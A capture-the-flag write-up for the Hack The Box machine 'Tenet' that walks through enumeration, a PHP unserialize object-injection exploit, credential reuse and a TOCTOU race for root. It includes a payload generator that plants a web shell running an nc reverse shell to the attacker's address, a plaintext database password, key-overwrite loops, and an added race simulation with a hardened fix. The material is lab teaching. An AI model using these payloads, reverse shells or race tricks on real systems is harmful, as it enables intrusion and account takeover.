Welcome to the Tenet writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Tenet
Tags: HTB, Medium, Linux
Platform: Hackthebox
Difficulty: Medium
OS: Linux
Enumeration
Nmap
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Tenet$ sudo nmap -sC -sV -p22,80 -n -oN PortsDepth.txt 10.129.54.208
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-16 16:03 EST
Nmap scan report for 10.129.54.208
Host is up (0.034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds
On port 80 we only find the default Apache page, so the next step is to fuzz the Host header for virtual hosts that the server may be serving.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "HOST: FUZZ.htb" -u http://10.129.54.216/ -mc 200 -fs 10918
We have found the domain tenet.htb (add it to /etc/hosts so it resolves to the target). Behind it there is a WordPress site; in one of the posts there is a comment, and two usernames appear: neil and protagonist.
kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Tenet$ gobuster dir -t 40 -u http://tenet.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://tenet.htb/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/01/16 16:24:20 Starting gobuster
===============================================================
/wp-content (Status: 301)
/index.php (Status: 301)
/wp-login.php (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/readme.html (Status: 200)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/wp-signup.php (Status: 302)
/server-status (Status: 403)
===============================================================
2021/01/16 16:38:47 Finished
===============================================================
A blog comment mentions a PHP file called sator and a backup of it, but however much I search for it under tenet.htb I cannot find it, so I look for it on the default virtual host (the IP) instead.
I have created a small dictionary with the words sator and backup and, fuzzing the IP with the extensions .php, .bak and .php.bak, we find the file sator.php.bak. Because Apache has no handler for .bak, the backup is served as plain text, so we get the full source of the script.
ffuf -w dict.txt -u http://10.129.54.216/FUZZ.php.bak -t 200
:: Method : GET
:: URL : http://10.129.54.216/FUZZ.php.bak
:: Wordlist : FUZZ: dict.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
sator [Status: 200, Size: 514, Words: 48, Lines: 32]
:: Progress: [1/2] :: Job [1/1] :: 1460 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
The content of the file is as follows:
    <?php
    class DatabaseExport
    {
        public $user_file = 'users.txt';
        public $data = '';

        public function update_db()
        {
            echo '[+] Grabbing users from text file <br>';
            $this->data = 'Success';
        }

        public function __destruct()
        {
            file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
            echo '[] Database updated <br>';
            // echo 'Gotta get this working properly...';
        }
    }

    $input = $_GET['arepo'] ?? '';
    $databaseupdate = unserialize($input);

    $app = new DatabaseExport;
    $app->update_db();
    ?>
Exploitation
As we can see, the arepo GET parameter is passed straight to unserialize(). That is a PHP object injection: we control the class and the property values of the object that unserialize() creates. The class DatabaseExport is defined in the same file, and its __destruct() method runs file_put_contents(__DIR__ . '/' . $this->user_file, $this->data) when the object is destroyed at the end of the request. So by serializing a DatabaseExport whose user_file is a .php name and whose data is PHP code, we get an arbitrary file write into the web root, which is RCE. Note that the script's own $app object plays no part in this: it is the destructor of the object we injected that does the work.
Using the following PHP code we can generate the serialized payload: the properties we choose are a file name in the web root and a PHP web shell that launches a reverse shell (replace 10.10.14.x with your own address).
<?php
// Same class name and property names as in sator.php; only the values change.
class DatabaseExport
{
    public $user_file = 'cmd.php';   // written relative to __DIR__, i.e. the web root
    public $data = "<?php system('touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.x 4444 > /tmp/f '); ?>";
}
// serialize() emits the O:14:"DatabaseExport":2:{...} structure; urlencode() makes it safe for the query string.
print urlencode(serialize(new DatabaseExport))."\n";
?>
kali@kali:$ php ExUnserialize.php
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22cmd.php%22%3Bs%3A4%3A%22data%22%3Bs%3A119%3A%22%3C%3Fphp+system%28%27touch+%2Ftmp%2Ff%3B+rm+%2Ftmp%2Ff%3B+mkfifo+%2Ftmp%2Ff%3B+cat+%2Ftmp%2Ff+%7C+%2Fbin%2Fsh+-i+2%3E%261+%7C+nc+10.10.14.x+4444+%3E+%2Ftmp%2Ff+%27%29%3B+%3F%3E%22%3B%7D
Now we send the payload to the vulnerable script, which writes cmd.php into the web root when the request finishes:
http://10.129.54.216/sator.php?arepo=<payload>
Then we start a listener (nc -lvnp 4444) and request http://10.129.54.216/cmd.php to receive the reverse shell as www-data.
Post exploitation
Privilege escalation to neil
To get the user flag we need to escalate from www-data to neil. The first thing that comes to mind is the WordPress configuration file, wp-config.php, which stores the database credentials in clear text.
www-data@tenet:/var/www/html/wordpress$ cat wp-config.php
.........................................................
/** MySQL database username */
define( 'DB_USER', 'neil' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );
.........................................................
This may also be neil's system password (credentials are often reused between the database and the account). Let's try it.
www-data@tenet:/var/www/html/wordpress$ su neil
Password: Opera2112
neil@tenet:/var/www/html/wordpress$
With this we can now read the user flag.
Next, some enumeration to find a path to root.
Enumeration
Sudo
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
neil@tenet:~$
Privilege escalation to root
We can run the file enableSSH.sh as root using sudo, without a password. Judging by what the exploit below relies on, the script stages the SSH key it installs in a temporary file named ssh* in /tmp and later reads that file back to add the key to root's authorized_keys. The window between that write and that read is a race condition (TOCTOU): if we overwrite the temporary file with our own public key during the window, it is our key that ends up authorized for root.
We generate a key pair locally with ssh-keygen and put the public key in a file called key.pub in /tmp on the target.
Note: tmux was used on the box to get the two terminals. Opening two separate SSH sessions did NOT work for me, since each SSH session got a clean /tmp directory.
In the first terminal we run the script in a loop; in the second, from /tmp, we keep overwriting whatever ssh* file appears:
Terminal1:$ while true; do sudo /usr/local/bin/enableSSH.sh; done >/dev/null
Terminal2:$ while true; do cat key.pub > $(ls ssh*);done 2>/dev/null
After a few seconds we stop both loops with Ctrl + C. If the race was won, our key is now in root's authorized_keys, and all that is left is to SSH into the machine as root with the matching private key and read the flag.
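A simulation of the race above, as an added example that is not the script from the box. The real enableSSH.sh is not reproduced on the page, so the vulnerable pattern here (stage the key in a predictably named, world-writable file in a shared directory, then read it back) is an assumption based on how the two loops in the writeup behave; the keys are constructed samples and LAB stands in for /tmp and /root/.ssh. It races a vulnerable installer against the writeup's overwrite loop and contrasts it with a hardened installer that has no staging file to attack.

```shell
#!/bin/sh
# Added example, not the script from the box. The vulnerable pattern below is
# ASSUMED from how the writeup's loops behave; LAB stands in for /tmp and
# /root/.ssh, and both keys are constructed samples.
LAB="$(mktemp -d)"
ROOT_KEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleLegitimateKeyMaterial root@tenet"
ATTACKER_KEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAttackerKeyMaterial neil@tenet"

# Vulnerable installer: the window between writing the staging file and
# reading it back is what the attacker loop targets (TOCTOU).
vulnerable_install() {
    auth="$1"
    tmp="$(mktemp "$LAB/ssh-XXXXXXXX")"
    chmod 666 "$tmp"                 # ASSUMED: staging file writable by everyone
    printf '%s\n' "$ROOT_KEY" > "$tmp"
    sleep 0.5                        # the window, exaggerated so one run suffices
    cat "$tmp" >> "$auth"            # reads whatever is in the file by now
    rm -f "$tmp"
}

# Hardened installer: no staging file in a shared directory at all, so there
# is nothing for another user to overwrite; restrictive umask for the key file.
hardened_install() {
    auth="$1"
    (umask 077; printf '%s\n' "$ROOT_KEY" >> "$auth")
}

# The writeup's second loop, `cat key.pub > $(ls ssh*)`, with one refinement:
# write to a side file and rename it into place, so the victim never reads a
# half-written file. Spins until the stop file appears.
attacker_loop() {
    stop="$1"
    while [ ! -e "$stop" ]; do
        for f in "$LAB"/ssh-*; do
            [ -e "$f" ] || continue
            printf '%s\n' "$ATTACKER_KEY" > "$LAB/.inject" && mv -f "$LAB/.inject" "$f" 2>/dev/null || true
        done
    done
}

# Run one installer while the attacker loop races it; print the key that
# ended up in the authorized_keys file.
race() {
    installer="$1"
    auth="$LAB/authorized_keys.$installer"
    stop="$LAB/stop.$installer"
    rm -f "$auth" "$stop"
    attacker_loop "$stop" &
    pid=$!
    "$installer" "$auth"
    : > "$stop"
    wait "$pid" 2>/dev/null || true
    rm -f "$LAB"/ssh-*               # a late rename may have recreated the staging file
    cat "$auth"
}

cleanup_lab() { rm -rf "$LAB"; }

printf 'vulnerable installer -> %s\n' "$(race vulnerable_install)"
printf 'hardened installer   -> %s\n' "$(race hardened_install)"
```

The window is exaggerated with sleep so a single run shows the outcome; on the real box it is tiny, which is why both sides run in loops until one iteration lines up. The hardened version is the fix a script like this needs: never stage secret material in a shared directory, and when a temporary file is unavoidable, create it with mktemp (never mktemp -u) under a directory only root can reach.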